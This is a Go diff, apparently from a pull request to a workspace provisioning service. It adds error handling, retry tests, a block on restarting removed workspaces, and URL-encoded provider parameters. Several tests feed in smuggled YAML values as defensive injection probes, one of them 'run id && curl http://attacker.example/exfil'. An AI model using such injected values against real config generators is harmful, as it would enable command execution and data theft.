|
||||
configYAML := string(files["config.yaml"])
|
||||
if !contains(configYAML, "runtime_config:") {
|
||||
t.Errorf("openclaw should have runtime_config, got:\n%s", configYAML)
|
||||
@@ -501,7 +526,10 @@ func TestEnsureDefaultConfig_HermesGetsRuntimeConfig(t *testing.T) {
|
||||
Runtime: "hermes",
|
||||
}
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-hermes", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-hermes", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
configYAML := string(files["config.yaml"])
|
||||
if !contains(configYAML, "runtime_config:") {
|
||||
t.Errorf("hermes should have runtime_config, got:\n%s", configYAML)
|
||||
@@ -528,7 +556,10 @@ func TestEnsureDefaultConfig_EmptyRuntimeDefaultsToClaudeCode(t *testing.T) {
|
||||
Model: "sonnet",
|
||||
}
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-empty-rt", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-empty-rt", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
configYAML := string(files["config.yaml"])
|
||||
if !contains(configYAML, "runtime: claude-code") {
|
||||
t.Errorf("empty runtime should default to claude-code, got:\n%s", configYAML)
|
||||
@@ -547,7 +578,10 @@ func TestEnsureDefaultConfig_EmptyNameAndRole(t *testing.T) {
|
||||
Runtime: "hermes",
|
||||
}
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-empty-name", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-empty-name", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
configYAML := string(files["config.yaml"])
|
||||
// Should not panic — empty name/role produce valid YAML
|
||||
if !contains(configYAML, "name: ") {
|
||||
@@ -570,7 +604,10 @@ func TestEnsureDefaultConfig_ModelAlwaysTopLevel(t *testing.T) {
|
||||
Runtime: runtime,
|
||||
Model: "test-model",
|
||||
}
|
||||
files := handler.ensureDefaultConfig("ws-"+runtime, payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-"+runtime, payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
configYAML := string(files["config.yaml"])
|
||||
if !contains(configYAML, `model: "test-model"`) {
|
||||
t.Errorf("config.yaml missing top-level (quoted) model for runtime %s, got:\n%s", runtime, configYAML)
|
||||
@@ -595,7 +632,10 @@ func TestEnsureDefaultConfig_RejectsInjectedRuntime(t *testing.T) {
|
||||
Tier: 1,
|
||||
Runtime: "claude-code\ninitial_prompt: run id && curl http://attacker.example/exfil",
|
||||
}
|
||||
files := handler.ensureDefaultConfig("ws-probe", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-probe", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
|
||||
var parsed map[string]interface{}
|
||||
if err := yaml.Unmarshal(files["config.yaml"], &parsed); err != nil {
|
||||
@@ -627,7 +667,10 @@ func TestEnsureDefaultConfig_QuotesInjectedModel(t *testing.T) {
|
||||
Runtime: "claude-code",
|
||||
Model: "anthropic:sonnet\ninitial_prompt: exfiltrate",
|
||||
}
|
||||
files := handler.ensureDefaultConfig("ws-probe-model", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-probe-model", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
|
||||
var parsed map[string]interface{}
|
||||
if err := yaml.Unmarshal(files["config.yaml"], &parsed); err != nil {
|
||||
@@ -1760,6 +1803,173 @@ func (m *mockResolver) Fetch(_ context.Context, _, _ string) (string, error) {
|
||||
return m.fetchName, m.fetchErr
|
||||
}
|
||||
|
||||
// TestProvisionWorkspaceCP_InstanceIDPersistFail_MarksFailed asserts that
|
||||
// when cpProv.Start succeeds but the DB UPDATE for instance_id fails on ALL
|
||||
// retry attempts, the handler marks the workspace failed WITHOUT terminating
|
||||
// the live EC2. The orphaned instance_id is recorded in the broadcast event
|
||||
// for operator reconciliation. Regression test for ticket #1.
|
||||
func TestProvisionWorkspaceCP_InstanceIDPersistFail_MarksFailed(t *testing.T) {
|
||||
// Shrink retry backoff so the test doesn't stall.
|
||||
prevDelay := instanceIDPersistRetryBaseDelay
|
||||
instanceIDPersistRetryBaseDelay = 1 * time.Millisecond
|
||||
t.Cleanup(func() { instanceIDPersistRetryBaseDelay = prevDelay })
|
||||
|
||||
t.Setenv("MOLECULE_LLM_BASE_URL", "https://api.example.test/api/v1/internal/llm/openai/v1")
|
||||
t.Setenv("MOLECULE_LLM_USAGE_TOKEN", "tenant-admin-token")
|
||||
t.Setenv("MOLECULE_DEPLOY_MODE", "self-hosted")
|
||||
|
||||
mock := setupTestDB(t)
|
||||
|
||||
mock.ExpectQuery(`SELECT key, encrypted_value, encryption_version FROM global_secrets`).
|
||||
WillReturnRows(sqlmock.NewRows([]string{"key", "encrypted_value", "encryption_version"}))
|
||||
mock.ExpectQuery(`SELECT key, encrypted_value, encryption_version FROM workspace_secrets`).
|
||||
WithArgs("ws-cp-orphan").
|
||||
WillReturnRows(sqlmock.NewRows([]string{"key", "encrypted_value", "encryption_version"}))
|
||||
|
||||
// mintWorkspaceSecrets: revoke + issue auth token + inbound secret
|
||||
mock.ExpectExec(`UPDATE workspace_auth_tokens SET revoked_at`).
|
||||
WithArgs("ws-cp-orphan").
|
||||
WillReturnResult(sqlmock.NewResult(0, 0))
|
||||
mock.ExpectExec(`INSERT INTO workspace_auth_tokens`).
|
||||
WithArgs("ws-cp-orphan", sqlmock.AnyArg(), sqlmock.AnyArg()).
|
||||
WillReturnResult(sqlmock.NewResult(1, 1))
|
||||
mock.ExpectExec(`UPDATE workspaces SET platform_inbound_secret`).
|
||||
WithArgs(sqlmock.AnyArg(), "ws-cp-orphan").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
// All 3 retry attempts fail.
|
||||
for i := 0; i < instanceIDPersistRetryAttempts; i++ {
|
||||
mock.ExpectExec(`UPDATE workspaces SET instance_id =`).
|
||||
WithArgs("ws-cp-orphan", "i-12345").
|
||||
WillReturnError(fmt.Errorf("connection reset by peer"))
|
||||
}
|
||||
|
||||
// markProvisionFailed updates status to failed.
|
||||
mock.ExpectExec(`UPDATE workspaces SET status =`).
|
||||
WithArgs(sqlmock.AnyArg(), sqlmock.AnyArg(), sqlmock.AnyArg()).
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
cap := &captureBroadcaster{}
|
||||
stub := &stubInstanceIDPersistFailCPProv{instanceID: "i-12345"}
|
||||
handler := NewWorkspaceHandler(cap, nil, "http://localhost:8080", t.TempDir())
|
||||
handler.SetCPProvisioner(stub)
|
||||
|
||||
handler.provisionWorkspaceCP("ws-cp-orphan", "/nonexistent/template", nil, models.CreateWorkspacePayload{
|
||||
Name: "ws-cp-orphan",
|
||||
Tier: 1,
|
||||
Runtime: "claude-code",
|
||||
})
|
||||
|
||||
if cap.lastData == nil {
|
||||
t.Fatal("expected RecordAndBroadcast to capture data on persist failure; got nothing")
|
||||
}
|
||||
if got := cap.lastData["error"]; got != "instance_id persist failed after retry — EC2 untracked" {
|
||||
t.Errorf("broadcast error message = %q, want 'instance_id persist failed after retry — EC2 untracked'", got)
|
||||
}
|
||||
if got := cap.lastData["instance_id"]; got != "i-12345" {
|
||||
t.Errorf("broadcast instance_id = %v, want 'i-12345'", got)
|
||||
}
|
||||
if got := cap.lastData["attempts"]; got != instanceIDPersistRetryAttempts {
|
||||
t.Errorf("broadcast attempts = %v, want %d", got, instanceIDPersistRetryAttempts)
|
||||
}
|
||||
// Security: RC 9378 — raw DB error must NEVER be client-visible in broadcast/WS/SSE.
|
||||
for _, key := range []string{"detail", "db_error", "raw_error"} {
|
||||
if val, has := cap.lastData[key]; has {
|
||||
t.Errorf("broadcast must NOT contain raw DB error under key %q; got %v", key, val)
|
||||
}
|
||||
}
|
||||
// Also verify no raw error string leaked into any broadcast field.
|
||||
for key, val := range cap.lastData {
|
||||
if s, ok := val.(string); ok && strings.Contains(s, "connection reset by peer") {
|
||||
t.Errorf("broadcast field %q contains raw DB error leak: %q", key, s)
|
||||
}
|
||||
}
|
||||
if stub.stopCalls != 0 {
|
||||
t.Errorf("Stop called %d times; want 0 (live instance must NOT be terminated)", stub.stopCalls)
|
||||
}
|
||||
}
|
||||
|
||||
// TestProvisionWorkspaceCP_InstanceIDPersistFail_RetrySucceeds asserts that a
|
||||
// transient DB blip on the first attempt is recovered by the bounded retry:
|
||||
// the second UPDATE succeeds and the workspace proceeds to online normally.
|
||||
func TestProvisionWorkspaceCP_InstanceIDPersistFail_RetrySucceeds(t *testing.T) {
|
||||
prevDelay := instanceIDPersistRetryBaseDelay
|
||||
instanceIDPersistRetryBaseDelay = 1 * time.Millisecond
|
||||
t.Cleanup(func() { instanceIDPersistRetryBaseDelay = prevDelay })
|
||||
|
||||
t.Setenv("MOLECULE_LLM_BASE_URL", "https://api.example.test/api/v1/internal/llm/openai/v1")
|
||||
t.Setenv("MOLECULE_LLM_USAGE_TOKEN", "tenant-admin-token")
|
||||
t.Setenv("MOLECULE_DEPLOY_MODE", "self-hosted")
|
||||
|
||||
mock := setupTestDB(t)
|
||||
|
||||
mock.ExpectQuery(`SELECT key, encrypted_value, encryption_version FROM global_secrets`).
|
||||
WillReturnRows(sqlmock.NewRows([]string{"key", "encrypted_value", "encryption_version"}))
|
||||
mock.ExpectQuery(`SELECT key, encrypted_value, encryption_version FROM workspace_secrets`).
|
||||
WithArgs("ws-cp-retry-ok").
|
||||
WillReturnRows(sqlmock.NewRows([]string{"key", "encrypted_value", "encryption_version"}))
|
||||
|
||||
// mintWorkspaceSecrets: revoke + issue auth token + inbound secret
|
||||
mock.ExpectExec(`UPDATE workspace_auth_tokens SET revoked_at`).
|
||||
WithArgs("ws-cp-retry-ok").
|
||||
WillReturnResult(sqlmock.NewResult(0, 0))
|
||||
mock.ExpectExec(`INSERT INTO workspace_auth_tokens`).
|
||||
WithArgs("ws-cp-retry-ok", sqlmock.AnyArg(), sqlmock.AnyArg()).
|
||||
WillReturnResult(sqlmock.NewResult(1, 1))
|
||||
mock.ExpectExec(`UPDATE workspaces SET platform_inbound_secret`).
|
||||
WithArgs(sqlmock.AnyArg(), "ws-cp-retry-ok").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
// First attempt fails, second succeeds.
|
||||
mock.ExpectExec(`UPDATE workspaces SET instance_id =`).
|
||||
WithArgs("ws-cp-retry-ok", "i-retry-ok").
|
||||
WillReturnError(fmt.Errorf("connection reset by peer"))
|
||||
mock.ExpectExec(`UPDATE workspaces SET instance_id =`).
|
||||
WithArgs("ws-cp-retry-ok", "i-retry-ok").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
cap := &captureBroadcaster{}
|
||||
stub := &stubInstanceIDPersistFailCPProv{instanceID: "i-retry-ok"}
|
||||
handler := NewWorkspaceHandler(cap, nil, "http://localhost:8080", t.TempDir())
|
||||
handler.SetCPProvisioner(stub)
|
||||
|
||||
handler.provisionWorkspaceCP("ws-cp-retry-ok", "/nonexistent/template", nil, models.CreateWorkspacePayload{
|
||||
Name: "ws-cp-retry-ok",
|
||||
Tier: 1,
|
||||
Runtime: "claude-code",
|
||||
})
|
||||
|
||||
// No failure broadcast should have fired.
|
||||
if cap.lastData != nil {
|
||||
t.Fatalf("expected NO failure broadcast on retry success; got %v", cap.lastData)
|
||||
}
|
||||
if stub.stopCalls != 0 {
|
||||
t.Errorf("Stop called %d times; want 0", stub.stopCalls)
|
||||
}
|
||||
}
|
||||
|
||||
// stubInstanceIDPersistFailCPProv implements CPProvisionerAPI for the
|
||||
// instance-id-persist-failure tests.
|
||||
type stubInstanceIDPersistFailCPProv struct {
|
||||
instanceID string
|
||||
stopCalls int
|
||||
}
|
||||
|
||||
func (s *stubInstanceIDPersistFailCPProv) Start(_ context.Context, _ provisioner.WorkspaceConfig) (string, error) {
|
||||
return s.instanceID, nil
|
||||
}
|
||||
func (s *stubInstanceIDPersistFailCPProv) Stop(_ context.Context, _ string) error {
|
||||
s.stopCalls++
|
||||
return nil
|
||||
}
|
||||
func (s *stubInstanceIDPersistFailCPProv) StopAndPrune(_ context.Context, _ string) error { return nil }
|
||||
func (s *stubInstanceIDPersistFailCPProv) GetConsoleOutput(_ context.Context, _ string) (string, error) {
|
||||
return "", nil
|
||||
}
|
||||
func (s *stubInstanceIDPersistFailCPProv) IsRunning(_ context.Context, _ string) (bool, error) {
|
||||
return true, nil
|
||||
}
|
||||
|
||||
// TestRuntimeUsesAnthropicNativeProxy_CaseAndWhitespace proves the
|
||||
// strings.EqualFold hardening: the runtime check now matches "claude-code"
|
||||
// case-insensitively (and after trimming whitespace) instead of relying on
|
||||
|
||||
@@ -229,6 +229,13 @@ func (h *WorkspaceHandler) Restart(c *gin.Context) {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "lookup failed"})
|
||||
return
|
||||
}
|
||||
// Block restart if workspace is removed — same 404 as not-found so we don't
|
||||
// leak that the row ever existed, and to prevent resurrecting a removed
|
||||
// workspace to 'provisioning' before the async runRestartCycle guard fires.
|
||||
if status == string(models.StatusRemoved) {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "workspace not found"})
|
||||
return
|
||||
}
|
||||
// Block restart if any ancestor is paused — must resume parent first
|
||||
if paused, parentName := isParentPaused(ctx, id); paused {
|
||||
c.JSON(http.StatusConflict, gin.H{"error": "parent workspace \"" + parentName + "\" is paused — resume it first"})
|
||||
|
||||
@@ -70,6 +70,33 @@ func TestRestartHandler_DBConnectionError(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestRestartHandler_RemovedWorkspaceReturns404(t *testing.T) {
|
||||
mock := setupTestDB(t)
|
||||
setupTestRedis(t)
|
||||
broadcaster := newTestBroadcaster()
|
||||
handler := NewWorkspaceHandler(broadcaster, nil, "http://localhost:8080", t.TempDir())
|
||||
|
||||
mock.ExpectQuery("SELECT status, name, tier, COALESCE").
|
||||
WithArgs("ws-removed").
|
||||
WillReturnRows(sqlmock.NewRows([]string{"status", "name", "tier", "runtime"}).
|
||||
AddRow("removed", "Removed Agent", 1, "claude-code"))
|
||||
|
||||
w := httptest.NewRecorder()
|
||||
c, _ := gin.CreateTestContext(w)
|
||||
c.Params = gin.Params{{Key: "id", Value: "ws-removed"}}
|
||||
c.Request = httptest.NewRequest("POST", "/workspaces/ws-removed/restart", nil)
|
||||
|
||||
handler.Restart(c)
|
||||
|
||||
if w.Code != http.StatusNotFound {
|
||||
t.Errorf("expected 404 for removed workspace, got %d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
if err := mock.ExpectationsWereMet(); err != nil {
|
||||
t.Errorf("unmet sqlmock expectations: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestRestartHandler_AncestorPausedBlocksRestart(t *testing.T) {
|
||||
mock := setupTestDB(t)
|
||||
setupTestRedis(t)
|
||||
|
||||
@@ -10,6 +10,7 @@ import (
|
||||
"io"
|
||||
"log"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
@@ -477,12 +478,25 @@ func (p *CPProvisioner) stopInternal(ctx context.Context, workspaceID string, pr
|
||||
// orphan sweeper / shutdown path can branch.
|
||||
return ErrNoBackend
|
||||
}
|
||||
url := fmt.Sprintf("%s/cp/workspaces/%s?instance_id=%s", p.baseURL, workspaceID, instanceID)
|
||||
provider, err := resolveProvider(ctx, workspaceID)
|
||||
if err != nil {
|
||||
return fmt.Errorf("cp provisioner: stop: resolve provider: %w", err)
|
||||
}
|
||||
|
||||
q := url.Values{}
|
||||
q.Set("instance_id", instanceID)
|
||||
if provider != "" {
|
||||
// #2386: CP Deprovision routes by provider so a non-AWS workspace is
|
||||
// torn down by its own backend instead of falling through to the AWS
|
||||
// terminate path (which would leak the box).
|
||||
q.Set("provider", provider)
|
||||
}
|
||||
if prune {
|
||||
// internal#734: ask CP to erase the data volume on this delete.
|
||||
url += "&prune=true"
|
||||
q.Set("prune", "true")
|
||||
}
|
||||
req, err := http.NewRequestWithContext(ctx, "DELETE", url, nil)
|
||||
u := fmt.Sprintf("%s/cp/workspaces/%s?%s", p.baseURL, workspaceID, q.Encode())
|
||||
req, err := http.NewRequestWithContext(ctx, "DELETE", u, nil)
|
||||
if err != nil {
|
||||
return fmt.Errorf("cp provisioner: stop: build request: %w", err)
|
||||
}
|
||||
@@ -549,6 +563,27 @@ var resolveInstanceID = func(ctx context.Context, workspaceID string) (string, e
|
||||
return instanceID.String, nil
|
||||
}
|
||||
|
||||
// resolveProvider reads workspaces.compute->>'provider' for the given workspace.
|
||||
// Returns ("", nil) when the row has no provider or the column is missing —
|
||||
// callers treat empty as "default provider" (AWS). Exposed as a package var
|
||||
// so tests can substitute a stub, same pattern as resolveInstanceID.
|
||||
var resolveProvider = func(ctx context.Context, workspaceID string) (string, error) {
|
||||
if db.DB == nil {
|
||||
return "", nil
|
||||
}
|
||||
var provider sql.NullString
|
||||
err := db.DB.QueryRowContext(ctx,
|
||||
`SELECT compute->>'provider' FROM workspaces WHERE id = $1`, workspaceID,
|
||||
).Scan(&provider)
|
||||
if err != nil && err != sql.ErrNoRows {
|
||||
return "", err
|
||||
}
|
||||
if !provider.Valid {
|
||||
return "", nil
|
||||
}
|
||||
return provider.String, nil
|
||||
}
|
||||
|
||||
// IsRunning checks workspace EC2 instance state via the control plane.
|
||||
//
|
||||
// Contract (matches the Docker Provisioner.IsRunning contract —
|
||||
|
||||
@@ -24,8 +24,11 @@ package provisioner
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"net/url"
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
@@ -97,6 +100,141 @@ func TestStop_NoInstanceIDSkipsCPCall(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
// TestStop_SendsProviderQueryParam — #2386 regression guard. When the
|
||||
// workspace row carries a non-empty provider (e.g. "hetzner", "gcp"), the
|
||||
// deprovision DELETE must include ?provider= so CP routes to the correct
|
||||
// backend. Without it, non-AWS workspaces fall through to the AWS terminate
|
||||
// path and leak.
|
||||
func TestStop_SendsProviderQueryParam(t *testing.T) {
|
||||
primeInstanceIDLookup(t, map[string]string{
|
||||
"ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c": "i-0a1b2c3d4e5f67890",
|
||||
})
|
||||
primeProviderLookup(t, map[string]string{
|
||||
"ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c": "hetzner",
|
||||
})
|
||||
|
||||
var sawProvider string
|
||||
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
sawProvider = r.URL.Query().Get("provider")
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
defer srv.Close()
|
||||
|
||||
p := &CPProvisioner{
|
||||
baseURL: srv.URL,
|
||||
orgID: "org-1",
|
||||
sharedSecret: "s3cret",
|
||||
adminToken: "tok-xyz",
|
||||
httpClient: srv.Client(),
|
||||
}
|
||||
if err := p.Stop(context.Background(), "ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c"); err != nil {
|
||||
t.Fatalf("Stop: %v", err)
|
||||
}
|
||||
|
||||
if sawProvider != "hetzner" {
|
||||
t.Errorf("#2386 REGRESSION: provider query = %q, want hetzner. "+
|
||||
"CP would route to AWS backend and leak the non-AWS box.", sawProvider)
|
||||
}
|
||||
}
|
||||
|
||||
// TestStop_EmptyProviderOmitsQueryParam — when provider is absent (default
|
||||
// AWS path), the URL must not include ?provider= so the CP uses its default
|
||||
// AWS terminate route.
|
||||
func TestStop_EmptyProviderOmitsQueryParam(t *testing.T) {
|
||||
primeInstanceIDLookup(t, map[string]string{
|
||||
"ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c": "i-0a1b2c3d4e5f67890",
|
||||
})
|
||||
primeProviderLookup(t, map[string]string{}) // empty → "" for everything
|
||||
|
||||
var sawProvider string
|
||||
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
sawProvider = r.URL.Query().Get("provider")
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
defer srv.Close()
|
||||
|
||||
p := &CPProvisioner{
|
||||
baseURL: srv.URL,
|
||||
orgID: "org-1",
|
||||
httpClient: srv.Client(),
|
||||
}
|
||||
if err := p.Stop(context.Background(), "ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c"); err != nil {
|
||||
t.Fatalf("Stop: %v", err)
|
||||
}
|
||||
|
||||
if sawProvider != "" {
|
||||
t.Errorf("provider query = %q, want omitted. Empty provider must default to AWS.", sawProvider)
|
||||
}
|
||||
}
|
||||
|
||||
// TestStop_ProviderLookupErrorFailsClosed — #2386 CR2. If the DB/provider
|
||||
// lookup fails after instance_id resolves, a non-AWS workspace must NOT
|
||||
// silently omit provider= and fall back to the AWS terminate path. The fix
|
||||
// must return the error (fail closed) so the caller retries instead of
|
||||
// leaking the box.
|
||||
func TestStop_ProviderLookupErrorFailsClosed(t *testing.T) {
|
||||
primeInstanceIDLookup(t, map[string]string{
|
||||
"ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c": "i-0a1b2c3d4e5f67890",
|
||||
})
|
||||
prev := resolveProvider
|
||||
resolveProvider = func(_ context.Context, _ string) (string, error) {
|
||||
return "", fmt.Errorf("db connection reset")
|
||||
}
|
||||
defer func() { resolveProvider = prev }()
|
||||
|
||||
called := false
|
||||
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
called = true
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
defer srv.Close()
|
||||
|
||||
p := &CPProvisioner{baseURL: srv.URL, orgID: "org-1", httpClient: srv.Client()}
|
||||
err := p.Stop(context.Background(), "ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c")
|
||||
if err == nil {
|
||||
t.Fatal("want error when provider lookup fails, got nil — would leak to AWS path")
|
||||
}
|
||||
if called {
|
||||
t.Error("CR2 REGRESSION: Stop hit CP after provider lookup error — should fail closed before any CP call")
|
||||
}
|
||||
}
|
||||
|
||||
// TestStop_ProviderQueryParamIsEncoded — #2386 CR2. Provider slugs that
|
||||
// contain query-special characters must be URL-encoded so they don't
|
||||
// corrupt the DELETE URL or inject unintended query parameters.
|
||||
func TestStop_ProviderQueryParamIsEncoded(t *testing.T) {
|
||||
primeInstanceIDLookup(t, map[string]string{
|
||||
"ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c": "i-0a1b2c3d4e5f67890",
|
||||
})
|
||||
primeProviderLookup(t, map[string]string{
|
||||
// Intentionally hostile slug: contains '=', '&', and '%'.
|
||||
"ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c": "prov=a&b=2%c",
|
||||
})
|
||||
|
||||
var rawQuery string
|
||||
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
rawQuery = r.URL.RawQuery
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
defer srv.Close()
|
||||
|
||||
p := &CPProvisioner{baseURL: srv.URL, orgID: "org-1", httpClient: srv.Client()}
|
||||
if err := p.Stop(context.Background(), "ws-cd5c9906-bfd7-4e2a-8c0b-9f1e2d3a4b5c"); err != nil {
|
||||
t.Fatalf("Stop: %v", err)
|
||||
}
|
||||
|
||||
// The raw query must NOT contain the literal hostile string — it must
|
||||
// be percent-encoded. If it appears literally, url.Values was not used.
|
||||
if strings.Contains(rawQuery, "prov=a&b=2%c") {
|
||||
t.Errorf("CR2 REGRESSION: provider query param is raw/unchecked — contains literal hostile string in %q", rawQuery)
|
||||
}
|
||||
// Sanity: after decoding the provider value must round-trip correctly.
|
||||
parsed, _ := url.ParseQuery(rawQuery)
|
||||
if parsed.Get("provider") != "prov=a&b=2%c" {
|
||||
t.Errorf("provider round-trip failed: got %q, want prov=a&b=2%%c", parsed.Get("provider"))
|
||||
}
|
||||
}
|
||||
|
||||
// TestIsRunning_UsesRealInstanceIDNotWorkspaceUUID mirrors the Stop test
|
||||
// for IsRunning's GET /cp/workspaces/:id/status?instance_id=... path.
|
||||
// Same class of bug, same acceptance criterion.
|
||||
|
||||
@@ -32,6 +32,21 @@ func primeInstanceIDLookup(t *testing.T, pairs map[string]string) {
|
||||
t.Cleanup(func() { resolveInstanceID = prev })
|
||||
}
|
||||
|
||||
// primeProviderLookup swaps resolveProvider for a stub that returns the
|
||||
// mapped provider for the given workspace_id, or "" for anything not in
|
||||
// the map. Mirrors primeInstanceIDLookup for the #2386 deprovider path.
|
||||
func primeProviderLookup(t *testing.T, pairs map[string]string) {
|
||||
t.Helper()
|
||||
prev := resolveProvider
|
||||
resolveProvider = func(_ context.Context, wsID string) (string, error) {
|
||||
if p, ok := pairs[wsID]; ok {
|
||||
return p, nil
|
||||
}
|
||||
return "", nil
|
||||
}
|
||||
t.Cleanup(func() { resolveProvider = prev })
|
||||
}
|
||||
|
||||
// TestNewCPProvisioner_RequiresOrgID — self-hosted deployments don't
|
||||
// have a MOLECULE_ORG_ID, and the provisioner must refuse to construct
|
||||
// rather than silently phone home to the prod CP with an empty tenant.
|
||||
|
||||
Reference in New Issue
Block a user